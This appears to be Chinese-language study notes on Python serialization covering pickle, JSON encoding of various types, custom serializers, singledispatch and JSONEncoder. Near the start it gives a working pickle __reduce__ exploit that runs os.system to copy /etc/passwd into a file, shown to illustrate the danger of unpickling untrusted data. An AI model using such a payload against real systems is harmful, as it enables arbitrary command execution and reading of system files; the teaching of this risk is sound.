pickling
pickling on UNIX
重要!unpickle 可執行程式,有資安風險。不要 unpickling 不是你自己 pickling 的資料。
import os
import pickle
class Exploit():
def __reduce__(self):
# cat [-u] [-s] [-v [-t] [-e] ] file 本例用來檢視內容,並存入 exploit.txt
# curl [options] [URL...] 本例取得 google 首頁資料,也是存入 exploit.txt
return (os.system, ("cat /etc/passwd > exploit.txt && curl www.google.com >> exploit.txt",))
def serialize_exploit(fname):
with open(fname, 'wb') as f: # wb: write binary
pickle.dump(Exploit(), f)
serialize_exploit('loadme')
pickle.load(open('loadme', 'rb')) # rb: read binary
然後觀察該路徑(/etc/passwd
)的相關檔案變化,以及檔案內容(exploit.txt
,基本上就是上方程式中註解說明的:/etc/passwd 路徑內容,加上 google 首頁資料)。
上述程式僅支援 UNIX & iOS,不支援 MS-Windows。
Pickling Dictionaries
import pickle
ser = pickle.dumps('Python Pickled Peppers')
ser
# b'\x80\x04\x95\x1a\x00\x00\x00\x00\x00\x00\x00\x8c\x16Python Pickled Peppers\x94.'
deser = pickle.loads(ser)
deser
# 'Python Pickled Peppers'
# 精簡過,非原整原始碼。
# 先指定 d = 原始資料,再令 er = pickle.dumps(d),藉此來展示 is(identiy) 和 ==(equality)
d is deser, d == deser
# (False, True)
# 接著展示不同資料型態的執行結果
# ser = pickle.dumps(3.14) # float
# ser = pickle.dumps([10, 20, ('a', 'b', 30)]) # list
# s = {'a', 'b', 'x', 10} # set
# ser = pickle.dumps({'b': 1, 'a': 2, 'c': {'x': 10, 'y': 20}}) # dictionary
如果要 pickle 的 dictionary,其中部分值是參考另一個 dictionary 呢?
d1 = {'a': 10, 'b': 20}
d2 = {'x': 100, 'y': d1, 'z': d1}
ser = pickle.dumps(d2)
d3 = pickle.loads(ser)
d3['y'] == d2['y']
# True
d3['y'] is d2['y']
# False
接著看如果資料來源是同一個(上述 d1)時,pickling 不會再做一次,而是指向同一個物件(類似 deepcopy 的行為模式)。
不只是 dictionary,lists, sets 和 tuples 也一樣。
d2['y'] is d2['z']
# True
d3['y'] == d3['z']
# True
上述行為,在我們使用 serialization / deserialization 時要特別小心。因為參考同一個 object,serialization / deserialization 後的值,會是原來的參考值。
對照一:沒有用 serialization 時,行為符合我們預期
d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}
print(d1)
# {'a': 1, 'b': 2}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2}}
d1['c'] = 3
print(d1)
# {'a': 1, 'b': 2, 'c': 3}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2, 'c': 3}}
對照二:使用 serialization 時。下次程式執行時,d2 的值,對照到原先的 d1(沒有 ‘c’: 3),而不是新的。
d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}
d1_ser = pickle.dumps(d1)
d2_ser = pickle.dumps(d2)
# simulate exiting the program, or maybe just restarting the notebook
del d1
del d2
# load the data back up
d1 = pickle.loads(d1_ser)
d2 = pickle.loads(d2_ser)
# and continue processing as before
print(d1)
# {'a': 1, 'b': 2}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2}}
d1['c'] = 3
print(d1)
# {'a': 1, 'b': 2, 'c': 3}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2}} # 這裡沒有 'c': 3
最後用老範例(class Person),再驗證一次上述行為。
The pickle module is relatively intelligent and will not re-pickle an object it has already pickled - which means that relative references are preserved.
__
JSON Serialization
基本操作
import json # 注意!本例下方的範例程式,已省略本 import
# serialization
d1 = {'a': 100, 'b': 200}
d1_json = json.dumps(d1)
d1_json, type(d1_json)
# ('{"a": 100, "b": 200}', str)
# deserialization
d2 = json.loads(d1_json)
d2, type(d2)
# ({'a': 100, 'b': 200}, dict)
# equality checking
d1 == d2
# True
提醒:d1 serialization 前後的不同。 {‘a’: 100, ‘b’: 200} vs ‘{“a”: 100, “b”: 200}’
我們可以在 print 中,設定 json.dumps 的參數,讓顯示美觀些。
print(json.dumps(d1, indent=2))
輸出:
{
"a": 100,
"b": 200
}
注意資料型態
Python 的 key,只要是 hashable 即可。但 JSON 的 key,必須是 string。
先來看看當 Python 的 key 是整數時,程式執行過程。
d1 = {1: 100, 2: 200}
d1_json = json.dumps(d1)
d1_json
# '{"1": 100, "2": 200}' # from 1 to "1"
d2 = json.loads(d1_json)
print(d1)
# {1: 100, 2: 200}
print(d2)
# {'1': 100, '2': 200}
注意:上方的程式顯示,Python 將 key 整數,轉換為 string。1 變 “1”、2 變 “2”。
所以 d == loads(dumps(d)) 不成立。
接著看一下,Python 中的一個長字串(內容是 JSON),在做過 serialization / deserialization 後的結果。
d_json = '''
{
"name": "John Cleese",
"age": 82,
"height": 1.96,
"walksFunny": true,
"sketches": [
{
"title": "Dead Parrot",
"costars": ["Michael Palin"]
},
{
"title": "Ministry of Silly Walks",
"costars": ["Michael Palin", "Terry Jones"]
}
],
"boring": null
}
'''
# deserialize this JSON string
d = json.loads(d_json)
print(d)
# {'name': 'John Cleese', 'age': 82, 'height': 1.96,... 過長,恕刪
d
{'name': 'John Cleese',
'age': 82,
'height': 1.96,
'walksFunny': True, # 原本是 true
'sketches': [{'title': 'Dead Parrot', 'costars': ['Michael Palin']},
{'title': 'Ministry of Silly Walks',
'costars': ['Michael Palin', 'Terry Jones']}],
'boring': None} # 原本是 null
注意:serialization / deserialization 後,JSON object不保證 key 的順序相同。
接著檢查 serialization / deserialization 後的資料型態。
print(d['age'], type(d['age']))
print(d['height'], type(d['height']))
print(d['boring'], type(d['boring']))
print(d['sketches'], type(d['sketches']))
print(d['walksFunny'], type(d['walksFunny']))
print(d['sketches'][0], type(d['sketches'][0]))
輸出:
82 <class 'int'>
1.96 <class 'float'>
None <class 'NoneType'>
[{'title': 'Dead Parrot', 'costars': ['Michael Palin']}, {'title': 'Ministry of Silly Walks', 'costars': ['Michael Palin', 'Terry Jones']}] <class 'list'>
True <class 'bool'>
{'title': 'Dead Parrot', 'costars': ['Michael Palin']} <class 'dict'>
As you can see the JSON
array
was serialized into a list
,
true
was serialized into a bool
,
integer looking values into int
,
float looking values into float
and
sub-objects into dict
.
As you can see deserializing JSON objects into Python is very straightforward and intuitive.
tuples serializing
d = {'a': (1, 2, 3)}
json.dumps(d)
# '{"a": [1, 2, 3]}'
Python tuples are serialized into JSON lists
bad_json = '''
{"a": (1, 2, 3)}
'''
json.loads(bad_json)
# JSONDecodeError # 這個錯誤提示不是太明顯
Python was able to serialize a tuple by making it into a JSON array
How about other data types: Decimals, Fractions, Complex Numbers, Sets, etc
Decimals
from decimal import Decimal
json.dumps({'a': Decimal('0.5')})
# TypeError
Complex
try:
json.dumps({"a": 1+1j})
except TypeError as ex:
print(ex)
# Object of type 'complex' is not JSON serializable
Set
try:
json.dumps({"a": {1, 2, 3}})
except TypeError as ex:
print(ex)
# Object of type 'set' is not JSON serializable
Now we could get around that problem by looking at the string representation of those objects:
str(Decimal(0.5))
# '0.5'
json.dumps({"a": str(Decimal(0.5))})
# '{"a": "0.5"}'
Own objects
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
def __repr__(self):
return f'Person(name={self.name}, age={self.age})'
p = Person('John', 82)
p
# Person(name=John, age=82)
json.dumps({"john": p})
# TypeError
Solution: write a custom JSON serializer in our class itself, and use that when we serialize the object
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
def __repr__(self):
return f'Person(name={self.name}, age={self.age})'
def toJSON(self):
return dict(name=self.name, age=self.age)
p = Person('John', 82)
p.toJSON()
# {'name': 'John', 'age': 82}
print(json.dumps({"john": p.toJSON()}, indent=2))
輸出:
{
"john": {
"name": "John",
"age": 82
}
}
we can make our life a little easier by using the
vars
function (or the__dict__
attribute) to return a dictionary of our object attributes
vars(p) # vars function
# {'name': 'John', 'age': 82}
p.__dict__
# {'name': 'John', 'age': 82}
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
def __repr__(self):
return f'Person(name={self.name}, age={self.age})'
def toJSON(self):
# return dict(name=self.name, age=self.age)
return vars(self)
json.dumps(dict(john=p.toJSON()))
# '{"john": {"name": "John", "age": 82}}'
dealing with sets, where we do not control the class definition
s = {1, 2, 3}
json.dumps(dict(a=list({1, 2, 3})))
# '{"a": [1, 2, 3]}'
問題:
-
we have to remember to call
.toJSON()
for our custom objects -
what about built-in or standard types like sets, or dates? use built-in or write custom functions to convert and call them every time?
Custom JSON Serialization
datetime
from datetime import datetime
import json
current = datetime.utcnow()
# datetime.datetime(2022, 12, 20, 11, 37, 44, 408640)
json.dumps(current)
# TypeError
Python raises a
TypeError
exception, stating thatdatetime
objects are not JSON serializable.
from datetime import datetime
import json
def format_iso(dt):
return dt.strftime('%Y-%m-%dT%H:%M:%S')
format_iso(current)
# '2022-12-20T11:37:44'
current.isoformat()
# '2022-12-20T11:37:44.408640'
log_record = {'time': datetime.utcnow().isoformat(), 'message': 'testing'}
json.dumps(log_record)
# {"time": "2022-12-20T11:42:02.394702", "message": "testing"}
this works, but this is far from ideal. Normally, our dictionary will contain the
datetime
object, not it’s string representation.What we have to do is write custom code to replace non-JSON serializable objects in our dictionary with custom representations.
The simplest way is to specify a function that
dump
/dumps
will call when it encounters something it cannot serialize
def format_iso(dt):
return dt.isoformat()
json.dumps(log_record, default=format_iso)
# {"time": "2022-12-20T11:43:12.487649", "message": "testing"}
log_record = {
'time': datetime.utcnow(),
'message': 'Testing...',
'other': {'a', 'b', 'c'} # set尚未處理
}
json.dumps(log_record, default=format_iso)
# AttributeError
if else 判斷式,一個一個加上待處理的資料型態
def custom_json_formatter(arg):
if isinstance(arg, datetime):
return arg.isoformat()
elif isinstance(arg, set):
return list(arg)
接著以萬年範例 class Person 做示範
程式碼略(原理都相同,只是換用 custom object 示範)
class Person 中的 datetime 因為已處理,不用再處理一次。
toJSON method
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
self.create_dt = datetime.utcnow()
def __repr__(self):
return f'Person(name={self.name}, age={self.age})'
def toJSON(self):
# return {
# 'name': self.name,
# 'age': self.age,
# 'create_dt': self.create_dt
# }
return vars(self)
用一個較通用的方式,來處理更多不同的資料型態。
def custom_json_formatter(arg):
if isinstance(arg, datetime):
return arg.isoformat()
elif isinstance(arg, set):
return list(arg)
else:
try:
return arg.toJSON()
except AttributeError:
try:
return vars(arg)
except TypeError:
return str(arg)
singledispatch
re-write our custom json formatter using the generic single dispatch decorator.
from functools import singledispatch
@singledispatch
def json_format(arg):
print(arg)
try:
print('\ttrying to use toJSON...')
return arg.toJSON()
except AttributeError:
print('\tfailed - trying to use vars...')
try:
return vars(arg)
except TypeError:
print('\tfailed - using string representation...')
return str(arg)
然後再一一 register
不同的資料型態。
@json_format.register(datetime)
def _(arg):
return arg.isoformat()
@json_format.register(set)
def _(arg):
return list(arg)
最後用之前的 class Person 再示範一次。
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
self.create_dt = datetime.utcnow()
def __repr__(self):
return f'Person(name={self.name}, age={self.age})'
def toJSON(self):
return dict(name=self.name)
# 比較用
# 方法一:
# return {
# 'name': self.name,
# 'age': self.age,
# 'create_dt': self.create_dt
# }
# 方法二:
# return vars(self)
Custom JSON Encoding using JSONEncoder
JSONEncoder
Encode the “standard” types, such as
str
,int
,float
,list
,dict
, etc.
Python | JSON |
---|---|
dict | object {…} |
list, tuple | array […] |
str | string … |
int, float | number |
int or float Enums | number |
bool | true or false |
None | null |
TypeError exception
non-supported objects
We can actually extend this
JSONEncoder
class and override the default method.
import json
from datetime import datetime
class CustomJSONEncoder(json.JSONEncoder):
def default(self, arg):
if isinstance(arg, datetime):
return arg.isoformat()
else:
super().default(arg)